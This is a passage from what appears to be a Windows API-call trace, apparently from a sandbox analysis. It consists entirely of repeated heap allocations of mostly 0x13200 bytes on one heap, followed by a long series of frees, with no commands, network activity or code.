0x21a1bd0 [0126.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1f8) returned 0x5387a0 [0126.639] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x52ac50 | out: hHeap=0x520000) returned 1 [0126.639] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x21b4de0 [0126.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x21c7ff0 [0126.640] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x21db200 [0126.641] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x21ee410 [0126.642] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2210080 [0126.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2223290 [0126.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22364a0 [0126.643] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22496b0 [0126.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x225c8c0 [0126.644] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x226fad0 [0126.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2282ce0 [0126.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2295ef0 [0126.645] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22a9100 [0126.646] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22bc310 [0126.646] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22cf520 [0126.646] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22e2730 [0126.647] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x22f5940 [0126.647] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2308b50 [0126.648] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x231bd60 [0126.648] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x232ef70 [0126.649] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2342180 [0126.649] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2f0) returned 0x5389a0 [0126.649] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5387a0 | out: hHeap=0x520000) returned 1 [0126.649] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2355390 [0126.650] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x23685a0 [0126.650] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x237b7b0 [0126.650] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x238e9c0 [0126.651] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x23a1bd0 [0126.651] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x23b4de0 [0126.651] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x23c7ff0 [0126.652] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x23db200 [0126.652] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x23ee410 [0126.653] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2401620 [0126.653] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2414830 [0126.653] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2427a40 [0126.654] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x243ac50 [0126.654] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x244de60 [0126.654] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2461070 [0126.655] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2474280 [0126.655] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2487490 [0126.655] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x249a6a0 [0126.656] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x24ad8b0 [0126.656] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x24c0ac0 [0126.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x24d3cd0 [0126.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x24e6ee0 [0126.657] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x24fa0f0 [0126.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x250d300 [0126.658] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2520510 [0126.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2533720 [0126.659] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2546930 [0126.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2559b40 [0126.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x256cd50 [0126.660] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x257ff60 [0126.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2593170 [0126.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x468) returned 0x538ca0 [0126.661] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5389a0 | out: hHeap=0x520000) returned 1 [0126.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x25a6380 [0126.661] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x25b9590 [0126.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x25cc7a0 [0126.662] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x25df9b0 [0126.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x25f2bc0 [0126.663] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2610080 [0126.664] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2623290 [0126.665] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26364a0 [0126.666] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26496b0 [0126.666] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x265c8c0 [0126.666] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x266fad0 [0126.667] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2682ce0 [0126.667] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2695ef0 [0126.667] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26a9100 [0126.667] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26bc310 [0126.903] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26cf520 [0126.904] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26e2730 [0126.904] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x26f5940 [0126.904] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2708b50 [0126.905] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x271bd60 [0126.905] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x272ef70 [0126.906] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2742180 [0126.906] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2755390 [0126.907] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x27685a0 [0126.907] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x277b7b0 [0126.907] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x278e9c0 [0126.908] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x27a1bd0 [0126.908] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x27b4de0 [0126.908] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x27c7ff0 [0126.909] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x27db200 [0126.909] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x27ee410 [0126.910] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2801620 [0126.910] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2814830 [0126.910] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2827a40 [0126.911] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x283ac50 [0126.911] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x284de60 [0126.911] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2861070 [0126.912] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2874280 [0126.912] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2887490 [0126.912] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x289a6a0 [0126.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x28ad8b0 [0126.913] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x28c0ac0 [0126.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x28d3cd0 [0126.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x28e6ee0 [0126.914] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x28fa0f0 [0126.915] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x290d300 [0126.915] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2920510 [0126.916] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x698) returned 0x54cc90 [0126.916] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x538ca0 | out: hHeap=0x520000) returned 1 [0126.916] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2933720 [0126.916] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2946930 [0126.917] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2959b40 [0126.917] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x296cd50 [0126.917] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x297ff60 [0126.917] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2993170 [0126.918] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x29a6380 [0126.918] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x29b9590 [0126.919] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x29cc7a0 [0126.920] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x29df9b0 [0126.920] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x29f2bc0 [0126.921] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a05dd0 [0126.921] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a18fe0 [0126.921] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a2c1f0 [0126.922] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a3f400 [0126.922] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a52610 [0126.922] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a65820 [0126.923] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a78a30 [0126.923] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a8bc40 [0126.923] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2a9ee50 [0126.924] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ab2060 [0126.924] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ac5270 [0126.924] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ad8480 [0126.925] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2aeb690 [0126.925] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2afe8a0 [0126.926] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b11ab0 [0126.926] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b24cc0 [0126.926] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b37ed0 [0126.926] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b4b0e0 [0126.927] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b5e2f0 [0126.927] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b71500 [0126.928] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b84710 [0126.928] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2b97920 [0126.928] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2baab30 [0126.929] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2bbdd40 [0126.929] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2bd0f50 [0126.930] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2be4160 [0126.930] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2bf7370 [0126.931] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c0a580 [0126.931] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c1d790 [0126.931] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c309a0 [0126.932] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c43bb0 [0126.932] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c56dc0 [0126.932] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c69fd0 [0126.933] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c7d1e0 [0126.933] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2c903f0 [0126.934] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ca3600 [0126.934] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2cb6810 [0126.935] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2cc9a20 [0126.935] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2cdcc30 [0126.935] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2cefe40 [0126.935] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d03050 [0126.936] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d16260 [0126.936] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d29470 [0126.937] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d3c680 [0126.937] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d4f890 [0127.139] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d62aa0 [0127.139] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d75cb0 [0127.140] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d88ec0 [0127.140] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2d9c0d0 [0127.141] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2daf2e0 [0127.141] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2dc24f0 [0127.142] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2dd5700 [0127.142] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2de8910 [0127.143] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e10080 [0127.144] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e23290 [0127.145] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e364a0 [0127.145] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e496b0 [0127.146] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e5c8c0 [0127.146] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e6fad0 [0127.147] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x9e0) returned 0x54d330 [0127.147] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x54cc90 | out: hHeap=0x520000) returned 1 [0127.147] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e82ce0 [0127.148] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2e95ef0 [0127.148] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ea9100 [0127.148] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ebc310 [0127.149] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ecf520 [0127.149] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ee2730 [0127.150] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2ef5940 [0127.151] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f08b50 [0127.151] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f1bd60 [0127.151] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f2ef70 [0127.152] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f42180 [0127.152] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f55390 [0127.153] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f685a0 [0127.153] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f7b7b0 [0127.154] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x13200) returned 0x2f8e9c0 [0127.508] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x54d330 | out: hHeap=0x520000) returned 1 [0135.223] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x557b20 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x577920 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x58ab30 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x59dd40 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5b0f50 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5c4160 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5d7370 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5ea580 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5fd790 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1e40080 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1e53290 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1e664a0 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1e796b0 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1e8c8c0 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1e9fad0 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1eb2ce0 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1ec5ef0 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1ed9100 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1eec310 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1eff520 | out: hHeap=0x520000) returned 1 [0135.224] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x1f12730 | out: hHeap=0x520000) returned 1 [0135.225] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2010080 | out: hHeap=0x520000) returned 1 [0135.225] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2023290 | out: hHeap=0x520000) returned 1 [0135.225] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20364a0 | out: hHeap=0x520000) returned 1 [0135.225] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20496b0 | out: hHeap=0x520000) returned 1 [0135.225] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x205c8c0 | out: hHeap=0x520000) returned 1 [0135.235] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x206fad0 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2082ce0 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2095ef0 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20a9100 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20bc310 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20cf520 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20e2730 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x20f5940 | out: hHeap=0x520000) returned 1 [0135.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2108b50 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x211bd60 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x212ef70 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2142180 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2155390 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x21685a0 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x217b7b0 | out: hHeap=0x520000) returned 1 [0135.241] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x218e9c0 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x21a1bd0 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x21b4de0 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x21c7ff0 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x21db200 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x21ee410 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2210080 | out: hHeap=0x520000) returned 1 [0135.242] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2223290 | out: hHeap=0x520000) returned 1 [0135.461] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22364a0 | out: hHeap=0x520000) returned 1 [0135.461] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22496b0 | out: hHeap=0x520000) returned 1 [0135.461] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x225c8c0 | out: hHeap=0x520000) returned 1 [0135.461] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x226fad0 | out: hHeap=0x520000) returned 1 [0135.461] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2282ce0 | out: hHeap=0x520000) returned 1 [0135.461] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2295ef0 | out: hHeap=0x520000) returned 1 [0135.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22a9100 | out: hHeap=0x520000) returned 1 [0135.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22bc310 | out: hHeap=0x520000) returned 1 [0135.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22cf520 | out: hHeap=0x520000) returned 1 [0135.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22e2730 | out: hHeap=0x520000) returned 1 [0135.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x22f5940 | out: hHeap=0x520000) returned 1 [0135.462] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x2308b50 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x231bd60 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x232ef70 | out: hHeap=0x520000) returned 1 [0135.466] HeapFree (in: hHeap=0x520000, dwFlags=0x0, 